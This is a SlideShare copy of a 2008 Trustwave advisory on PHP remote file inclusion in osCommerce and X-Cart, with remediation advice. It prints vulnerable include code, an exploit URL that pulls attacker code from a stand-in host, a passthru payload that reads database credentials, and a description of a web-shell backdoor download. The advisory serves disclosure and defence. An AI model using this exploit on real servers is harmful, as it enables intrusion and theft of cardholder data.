SlideShare a Scribd company logo

php secure

A
ahmed zaichi
Technology
1 of 5
Download to read offline
E-commerce Security Advisory: PHP Remote File Inclusion Executive Summary In  investigations  of  approximately  300  payment  card  data  security  breaches,  Trustwave’s  compromise  investigations unit has observed an increase in the successful exploitation of PHP‐based e‐commerce Web  sites  via  remote  file‐inclusion  vulnerabilities.  We  believe  that  this  increase  is  due  to  the  prevalence  of  PHP‐based e‐commerce applications and the ease with which an attacker can exploit these applications’  vulnerabilities.     In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which  an  attacker  took  advantage  of  remote  file‐inclusion  vulnerabilities  in  PHP‐based  e‐commerce  applications.  The  vendors  of  these  applications  have  released  updates  to  secure  the  vulnerabilities,  but  the  root  problem  lies in  the  application  user’s  configuration of  the  applications  and installation  of  PHP  programming language on their server.    Properly  configuring  the  PHP  programming  language  on  a  server  can  easily  eliminate  a  system’s  vulnerability  to  PHP  remote  file‐inclusion  exploits.  Two  configuration  directives  included  within  PHP,  register_globals  and  allow_url_open,  make  the  PHP  remote  file  inclusion  exploit  possible.  When  enabled,  either  of  these  directives  may  allow  malicious  users  to  execute  their  own  PHP  code  on  a  vulnerable  system.    Fortunately,  through  the  php.ini  configuration  file,  register_globals  and  allow_url_open  directives  can  be  disabled  easily.  In  addition,  PHP  versions  4.2.0  or  later  disable  register_globals  by  default,  and  the  directive is not included in PHP version 6.0.    Trustwave  recommends  that  online  merchants  perform  stringent  code  reviews  to  ensure  that  their  e‐ commerce applications are properly patched and that the PHP on their servers is securely configured.    PHP Remote File Inclusion Trustwave  has  seen  an  increase  in  the  successful  exploitation  of  PHP‐based  e‐commerce  Web  sites  via  remote file‐inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP‐based e‐ commerce applications and the simplicity of exploiting these vulnerabilities.    PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is  particularly susceptible to the remote file‐inclusion exploit because the default installation of vulnerable  versions that leaves register_globals or allow_url_open enabled on the server opens a route through which a  remote system can execute PHP code as if it were located on the local system.   
For example, the include_once.php script included with vulnerable versions of the PHP‐based osCommerce  Online Merchant application provides one such route. The contents of the include_once.php script include  the following:  .  -------- include_once.php -------<? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> ---------------------------------  An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a  remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):    http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php   This  request  would  execute  the  a.php  script  located  on  the  attacker’s  Web  site  (MYBOX)  on  the  e‐ commerce server. The code included will vary depending on the attacker’s goals.     For example, the following command would output the contents of the application_top.php file present on  the  e‐commerce  Web  site.  The  contents  of  the  file  include  authentication  credentials  (username,  password, database location) for the backend MySQL customer database.    --- a.php --<? passthru("/bin/cat application_top.php")?> ------------  In  an  actual  case  of  PHP  remote  file  inclusion,  the  code  executed  would  be  significantly  more  complex  than in this example and often results in the download of Web‐based backdoors to the local system. Two  common Web‐based backdoors are r57shell and c99shell. These shells include a Web‐based interface that  enables  their  user  to  download  and  upload  files,  create  backdoor  listeners  that  monitor  traffic  on  the  system, send e‐mail, bounce connections to other servers and administrate SQL databases.    The following represents the main interface of the r57shell:                            Copyright 2008, Trustwave Page 2 of 5
        r57shell Interface      With the r57shell copied to the compromised system, the attacker can easily modify existing Web code  from a local Internet browser. In many cases the attacker will modify PHP code associated with the e‐ commerce application checkout process to send cardholder data to an external e‐mail account or force the  storage of cardholder data to the backend database for the attacker to retrieve at a later date.                  Copyright 2008, Trustwave Page 3 of 5
        PHP Remote File Inclusion Diagram Attacker’s Workstation 1. The attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker’s Web site. Vulnerable PHP-based ecommerce Web si te 2. The a.php PHP script is included and executed on the e-commer ce Web site. Attacker’s Website a.php r57shell.php 3. The a.php PHP script instructs the server to download the r 57shell.php backdoor to the ecommerce Web site. Targeted PHP-based E-commerce Applications and Remediation In a number of our recent investigations of payment card compromises, Trustwave has found a number  of attacks targeting vulnerable versions of PHP‐based e‐commerce applications such as osCommerce and  X‐Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a  remote file‐inclusion exploit to gain access to a system and extract sensitive information. We suspect that  this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease  with which these vulnerabilities can be exploited.     The most common manifestation of the PHP remote file‐inclusion exploit observed by Trustwave results  in the download of a malicious Web‐based backdoor onto an e‐commerce server and the subsequent  alteration of PHP code associated with the checkout process allowing for the harvest of cardholder data.              Copyright 2008, Trustwave Page 4 of 5
Remote file inclusion vulnerabilities in both the osCommerce and X‐Cart applications have been publicly  disclosed:    Remote file inclusion vulnerabilities  Application Vulnerable File Disclosure Date Reference osCommerce Online Merchant v2.1 include_once.php 06/16/2002 Bugtraq ID: 5037 Qualiteam X-Cart 4.x cmpi.php 09/08/2006 Bugtraq ID: 20108 Qualiteam X-Cart 3.5.0 config.php 09/11/2007 Bugtraq ID: 25637 prepare.php smarty.php product.php auth.php   Although the vendors listed above have released updates to patch the vulnerabilities, the root problem  lies on the application user’s side with the configuration of the PHP programming language on their  server.     E‐commerce merchants can easily avoid PHP remote file‐inclusion exploits by properly configuring the  PHP programming language installed on their server. The majority of PHP remote file‐inclusion exploits  are possible because of two configuration directives included within PHP; register_globals and  allow_url_open. When enabled, either of these directives may allow the inclusion of files from a remote site  for local execution.    An administrator can easily disable the register_globals and allow_url_open directives in the php.ini  configuration file. In PHP versions 4.2.0 or later, register_globals is disabled by default. In PHP 6.0, the  register_globals directive has been removed altogether.    In conclusion, to protect against PHP remote file‐inclusion exploits, Trustwave recommends that e‐ commerce merchants perform stringent code reviews to ensure that their e‐commerce applications are  properly patched and securely configured. At the very least, this process should include disabling the  register_globals and allow_url_open PHP directives in the php.ini configuration file.          About Trustwave   Trustwave is a global provider of information security and compliance management solutions to businesses and the  public sector. The company has serviced more than 30,000 organizations throughout the world including banks,  merchants, service providers and software developers that are required to validate compliance with industry best  practices for safeguarding information endorsed by American Express, Discover, MasterCard Worldwide, Visa  International and Visa USA. Trustwave is a leading certificate authority with thousands of secure sockets layer  (SSL) certificates issued. Trustwave is headquartered in Chicago with offices throughout North America, South  America, Europe, the Middle East, Africa, Asia and Australia.  Copyright 2008, Trustwave Page 5 of 5

Recommended

Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIMenggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIIsmail Fahmi
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield LiferayJosé A. Jiménez
 
Adding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationAdding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationFernando Lopez Aguilar
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
The requested URL could not be retrieved
The requested URL could not be retrievedThe requested URL could not be retrieved
The requested URL could not be retrievedwoodenpodium3364
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 

Recommended

Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIMenggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TIIsmail Fahmi
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield LiferayJosé A. Jiménez
 
Adding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationAdding Identity Management and Access Control to your Application
Adding Identity Management and Access Control to your ApplicationFernando Lopez Aguilar
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
The requested URL could not be retrieved
The requested URL could not be retrievedThe requested URL could not be retrieved
The requested URL could not be retrievedwoodenpodium3364
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answerssheibansari
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
cPanel & WHM Glossary
cPanel & WHM GlossarycPanel & WHM Glossary
cPanel & WHM GlossaryMr. Rajendra Mishra
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hackingViswanath Polaki
 
Lfi
LfiLfi
Lfipenetration Tester
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroubleImperva
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemEditor IJCATR
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksValency Networks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 

More Related Content

Similar to php secure

Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answerssheibansari
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroubleImperva
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemEditor IJCATR
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksValency Networks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 

Similar to php secure (20)

Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Php interview-questions and answers
Php interview-questions and answersPhp interview-questions and answers
Php interview-questions and answers
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 
cPanel & WHM Glossary
cPanel & WHM GlossarycPanel & WHM Glossary
cPanel & WHM Glossary
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Web application security
Web application securityWeb application security
Web application security
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hacking
 
Lfi
LfiLfi
Lfi
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Secure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusionSecure Code Warrior - Remote file inclusion
Secure Code Warrior - Remote file inclusion
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft Maalware
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
PHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized TroublePHP SuperGlobals - Supersized Trouble
PHP SuperGlobals - Supersized Trouble
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security Presentation
 
CMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer SystemCMS Website Security Threat Protection Oriented Analyzer System
CMS Website Security Threat Protection Oriented Analyzer System
 
Vulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP FrameworksVulnerability assessment of PHP Frameworks
Vulnerability assessment of PHP Frameworks
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issues
 

Recently uploaded

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 

Recently uploaded (20)

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 

php secure

  • 1. E-commerce Security Advisory: PHP Remote File Inclusion Executive Summary In  investigations  of  approximately  300  payment  card  data  security  breaches,  Trustwave’s  compromise  investigations unit has observed an increase in the successful exploitation of PHP‐based e‐commerce Web  sites  via  remote  file‐inclusion  vulnerabilities.  We  believe  that  this  increase  is  due  to  the  prevalence  of  PHP‐based e‐commerce applications and the ease with which an attacker can exploit these applications’  vulnerabilities.     In recent months, Trustwave’s compromise investigations unit has encountered multiple cases in which  an  attacker  took  advantage  of  remote  file‐inclusion  vulnerabilities  in  PHP‐based  e‐commerce  applications.  The  vendors  of  these  applications  have  released  updates  to  secure  the  vulnerabilities,  but  the  root  problem  lies in  the  application  user’s  configuration of  the  applications  and installation  of  PHP  programming language on their server.    Properly  configuring  the  PHP  programming  language  on  a  server  can  easily  eliminate  a  system’s  vulnerability  to  PHP  remote  file‐inclusion  exploits.  Two  configuration  directives  included  within  PHP,  register_globals  and  allow_url_open,  make  the  PHP  remote  file  inclusion  exploit  possible.  When  enabled,  either  of  these  directives  may  allow  malicious  users  to  execute  their  own  PHP  code  on  a  vulnerable  system.    Fortunately,  through  the  php.ini  configuration  file,  register_globals  and  allow_url_open  directives  can  be  disabled  easily.  In  addition,  PHP  versions  4.2.0  or  later  disable  register_globals  by  default,  and  the  directive is not included in PHP version 6.0.    Trustwave  recommends  that  online  merchants  perform  stringent  code  reviews  to  ensure  that  their  e‐ commerce applications are properly patched and that the PHP on their servers is securely configured.    PHP Remote File Inclusion Trustwave  has  seen  an  increase  in  the  successful  exploitation  of  PHP‐based  e‐commerce  Web  sites  via  remote file‐inclusion vulnerabilities. We believe this increase is due to the prevalent use of PHP‐based e‐ commerce applications and the simplicity of exploiting these vulnerabilities.    PHP remote file inclusion allows an attacker to run their own PHP code on a vulnerable Web site. PHP is  particularly susceptible to the remote file‐inclusion exploit because the default installation of vulnerable  versions that leaves register_globals or allow_url_open enabled on the server opens a route through which a  remote system can execute PHP code as if it were located on the local system.   
  • 2. For example, the include_once.php script included with vulnerable versions of the PHP‐based osCommerce  Online Merchant application provides one such route. The contents of the include_once.php script include  the following:  .  -------- include_once.php -------<? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> ---------------------------------  An attacker can then use this file to arbitrarily set the include_file parameter to include code present on a  remote Web site. The attacker would then simply enter the following into their browser (IE, Mozilla):    http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php   This  request  would  execute  the  a.php  script  located  on  the  attacker’s  Web  site  (MYBOX)  on  the  e‐ commerce server. The code included will vary depending on the attacker’s goals.     For example, the following command would output the contents of the application_top.php file present on  the  e‐commerce  Web  site.  The  contents  of  the  file  include  authentication  credentials  (username,  password, database location) for the backend MySQL customer database.    --- a.php --<? passthru("/bin/cat application_top.php")?> ------------  In  an  actual  case  of  PHP  remote  file  inclusion,  the  code  executed  would  be  significantly  more  complex  than in this example and often results in the download of Web‐based backdoors to the local system. Two  common Web‐based backdoors are r57shell and c99shell. These shells include a Web‐based interface that  enables  their  user  to  download  and  upload  files,  create  backdoor  listeners  that  monitor  traffic  on  the  system, send e‐mail, bounce connections to other servers and administrate SQL databases.    The following represents the main interface of the r57shell:                            Copyright 2008, Trustwave Page 2 of 5
  • 4.         PHP Remote File Inclusion Diagram Attacker’s Workstation 1. The attacker targets the vulnerable PHP code and instructs the server via a Web browser to include the a.php file present on the attacker’s Web site. Vulnerable PHP-based ecommerce Web si te 2. The a.php PHP script is included and executed on the e-commer ce Web site. Attacker’s Website a.php r57shell.php 3. The a.php PHP script instructs the server to download the r 57shell.php backdoor to the ecommerce Web site. Targeted PHP-based E-commerce Applications and Remediation In a number of our recent investigations of payment card compromises, Trustwave has found a number  of attacks targeting vulnerable versions of PHP‐based e‐commerce applications such as osCommerce and  X‐Cart. In these investigations, Trustwave has uncovered multiple cases in which an attacker utilizes a  remote file‐inclusion exploit to gain access to a system and extract sensitive information. We suspect that  this increase can be traced to the prevalent use of vulnerable versions of these applications and the ease  with which these vulnerabilities can be exploited.     The most common manifestation of the PHP remote file‐inclusion exploit observed by Trustwave results  in the download of a malicious Web‐based backdoor onto an e‐commerce server and the subsequent  alteration of PHP code associated with the checkout process allowing for the harvest of cardholder data.              Copyright 2008, Trustwave Page 4 of 5
